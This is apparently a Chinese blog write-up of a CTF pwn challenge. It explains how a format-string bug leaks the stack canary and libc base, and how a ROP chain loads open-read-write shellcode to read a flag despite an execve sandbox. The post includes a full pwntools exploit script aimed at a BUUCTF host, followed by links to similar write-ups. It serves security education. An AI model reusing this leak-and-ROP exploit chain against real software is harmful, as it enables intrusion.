【pwn】orw&rop --泄露libc基址,orw

最新推荐文章于 2025-05-08 23:29:40 发布
原创 最新推荐文章于 2025-05-08 23:29:40 发布 · 934 阅读 · 9 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#安全 #c语言 #网络安全 #python #网络
本文详细描述了一个在程序中发现的格式化字符串漏洞,通过禁用execve函数并定位参数位置,构造ROP,最终利用read函数读取shellcode实现本地代码执行。作者使用pwn库展示了如何在沙箱环境中利用给定的gadgets获取flag。

我们先看看程序的保护的情况

因为题目提示了orw,我们可以沙箱检测一下

可以发现是禁用的execve函数的,接着看函数逻辑

这里格式化字符串漏洞可以泄露canary和puts函数地址,先确定一下参数位置

可以发现参数是在第六个位置,接下来就是构造ROP,调用read函数读取shellcode到mmap开辟的地址就行,这里的gadget可以用题目给的libc.so.6进行寻找,exp如下:

from pwn import *

context(os='linux',arch='amd64',log_level='debug')

elf=ELF('./pwn')

libc=ELF('./libc.so.6')

io=remote("node4.buuoj.cn",28233)

puts_got=elf.got['puts']

io.recvuntil(b"sandbox\n")

payload=b'%8$s%11$p'+b'\x00'*7+p64(puts_got)

io.send(payload)

puts_addr=u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))

canary=int(io.recv(18),16)

print(hex(puts_addr))

print(hex(canary))

base=puts_addr-libc.sym['puts']

rdi=0x2a3e5+base

rsi=0x2be51+base

rdx_r12=0x11f497+base

read_addr=base+libc.sym['read']

ret=0x29cd6+base

io.recvuntil(b"flag now\n")

payload2=b'a'*0x28+p64(canary)+b'a'*0x8+p64(rdi)+p64(0)+p64(rsi)+p64(0x66660000)+p64(rdx_r12)+p64(0x100)+p64(0)+p64(read_addr)+p64(0x66660000)

io.send(payload2)

addr=0x66660000+0x200

payload3=shellcraft.open("./flag")

payload3+=shellcraft.read(3,addr,0x50)

payload3+=shellcraft.write(1,addr,0x50)

payload3=asm(payload3)

io.send(payload3)

io.interactive()

GGb0mb
关注
[PWN] 泄露libc HarekazeCTF_2019_baby_rop2
LDX的博客
11-28 898
pwn 64位 泄露libc版本
pwnable_orw-seccomp沙箱
个人笔记
04-11 1018
但是,并不是所有的系统调用都被需要,而且不安全的代码滥用系统调用会对系统造成安全威胁。seccomp安全机制能使一个进程进入到一种“安全”运行模式,该模式下的进程只能调用4种系统调用(system call),即 read(), write(), exit() 和 sigreturn(),否则进程便会被终止。还能调用o(open)/r(read)/w(write)功能,题目orw的提示就是这样来的!输出flag文件内容,sys_write(1,file,0x30);手动生成读取文件shellcode。
[pwn]ROP:信息泄露获取libc版本和地址
热门推荐
Breeze的博客
08-26 1万+
文章目录通过信息泄露获取libc版本和地址DynELF模块介绍pwn200 writeuppwn100 writeup 通过信息泄露获取libc版本和地址 有一些pwn题目中我们可以找到很明显的溢出,但程序中并没有system函数,也没有给出libc版本。但我们可以通过反复的溢出打印一些内存的值来在内存中搜索system的地址,这里主要使用的工具是pwntools中的D以内ELF模块。 DynEL...
pwnorw
weixin_43960998的博客
06-19 2112
本文分为两部分,一部分是2.27及一下的 setcontext + orw,一部分是 2.29 及以上的 setcontext + orw。 利用条件 2.27: 开了沙箱 uaf 等控制 free_hook 一、2.27 libc 2.27及以下的 setcontext: 给各寄存器传参分别由 rdi 来完成,一般的套路是线泄漏 libc 和 heap_base,我们把某一个 chunk 填充为: frame = SigreturnFrame() frame.rsp = libc.sym['__fr
PWN · ORW | shellcode】[HGAME 2023 week1]simple_shellcode
Mr_Fmnwon的博客
01-04 1036
注意,对于第一次输入的限制,这里刻意的打印了两种shellcode的长度。
CTF-pwn: orw
weixin_59166557的博客
10-27 1194
ORW(Open, Read, Write)是一种常见的利用技术,通常用于在攻破某个系统后读取文件(例如读出 flag 文件)的场景。
PWN题[强网先锋]orw超详细讲解(多解法)
am_03的博客
09-01 5181
知识点 构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖正常的返回地址。 \x00 截断符 shellcode里出现\x00就会从其截断,所以构造shellcode的时候要避免\x00 x64函数调用规则 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存
pwnable_orw
m0_58426698的博客
03-21 740
pwn的最经典的orw的题目,顺便学了一下手写汇编,对传参有了更深的理解
2022强网拟态pwn wp
weixin_51480590的博客
11-18 725
这次比赛本人并没有参加,然后听说这次比赛比较简单,所以最近抽时间复现一波。由于本人web不太好,也并未涉及过webpwn,遂只复现mimic以及vm和两道堆题。
CTF - PWNORW记录
最新发布
夜风的博客
05-08 398
CTF - PwnORW记录。
fastbin关于chunk size检查问题&&花式泄露libc&&极限getshell&&huxiangbei_2019_namesyste
azraelxuemo的博客
04-10 3208
上图就是大家很熟悉的关于fastbin大小的一个检查 首先是里面一层 chunksize 以及外面一层 这是c源码 而对于汇编层面,由于运行的时候知道具体是32位还是64位,所以做了一定的优化 r15就是我们对应的chunk头地址,+8就是size的起始地址 但注意看,我们其实只是取了size的低8位 那么这里就是绕过的关键,网上很多地方其实讲的都不是很多 只要我们找到的size的地方低8位满足如下要求即可 000000yx y满足在2~8之间就好,x随意 同时size高八位也随意 因为可以看到我.
BUUCTF-pwn学习 ciscn_2019_c_1/ libc泄露
2401_88083440的博客
03-20 1476
回顾一下我们学到的知识1.libc泄露原理,libc的保护机制2.GOT表和PLT表之间的关系3.64位和32位在传参方面的区别4.gadget是什么。
CTF中的PWN——绕NX防护2(泄露libc + 栈溢出)
壊壊的诱惑你的博客
10-23 2119
前言: 继续PWN的学习,今天整理一下绕过NX,同时libc本地不存在需要通过相应函数泄露地址的方式进行进行溢出。 本题工具介绍: LibcSearcher 一个基于libc_database写的python库,可以通过泄露的函数实际地址查找对应的libc版本。 from LibcSearcher import * #第二个参数,为已泄露的实际地址,或最后12...
CTF-PWN: 通过libc _environ 泄露栈地址的原理
weixin_59166557的博客
01-21 486
注意: 本文是基于的,我不能确保文章完全准确在libc中,_environ符号指向的是一个全局变量,通常用于存储程序的环境变量数组。具体来说,_environ是一个指向字符串数组的指针,每个字符串表示一个环境变量(如HOMEPATH等)。这个数组的结尾是一个NULL指针,表示环境变量的结束。
学习笔记pwn
weixin_73596352的博客
09-19 604
checksec,32位程序,NX保护放入32位的ida里,main函数这样进入到function函数,有88字节,read可以读入100字节的数据,存在栈溢出[外链图片转存中…(img-YAYZrmI8-1695114237612)]看字符串有没有system和bin_sh,都没有,可能是return to libc可以试试在libc里找system和bin_sh,肉眼可见左边有和函数,可以泄露write地址来得到libc版本。
[NKCTF2024]-PWN:leak解析(中国剩余定理泄露libc地址,汇编覆盖返回地址)
2301_79326813的博客
04-08 596
查看保护查看ida先放exp。
pwn7(利用格式化字符串泄露libc
2401_87427870的博客
01-25 776
手动计算偏移,偏移量为%51$p时是canary,为%53$p时就可以计算出libc。格式化字符串漏洞的考察。
泄漏libc基地址
yjh_fnu_ltn的博客
06-01 2240
这里可以利用vulnerable_function函数进行栈溢出,利用write函数泄漏write函数的地址,从而拿到libc,使用write函数泄漏write函数地址时(puts函数同理),即使程序在前面。利用write函数的got表和plt表,溢出得到write函数的地址,在计算得到libc_base基地址。先看汇编下调用write函数时参数的传递:(以32位为例),泄漏 fun_name的got地址和。
什么是代码重定位
weixin_46089486的博客
10-09 893
ARM体系结构-代码重定位 一、为什么会有重定位 1、程序的运行过程就是CPU不断的从内存中取出指令,然后执行指令的过程。 2、那么CPU是如何从内存中去去这些指令的呢?当然是通过内存地址来获取。 3、以前使用单片机时,没有仔细思考过这个问题,都是认为程序是烧写到芯片内部的flash中的,也没有仔细思考过,程序是怎么跳转到flash取指令并执行的。 4、对于嵌入式系统来说,它的程序可能会比较大,超出它内部的flash大小,我们的程序无法整个放入到芯片内部的flash中;甚至有些SoC芯片内部根本就没有fla
【CTF】【PWNorw
m0_50819561的博客
10-09 1882
这是沙盒机制,就是限制你能使用的syscall。 seccomp-tools这个工具能快速地查出你能使用地syscall。 我们能使用的常用的构造攻击链的只有open,read,write。 但是因为限制了syscall,所以我们不能用特殊的系统调用getshell。 有两种方法,一种直接写汇编,一种利用shellcraft构造。 下面是汇编: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值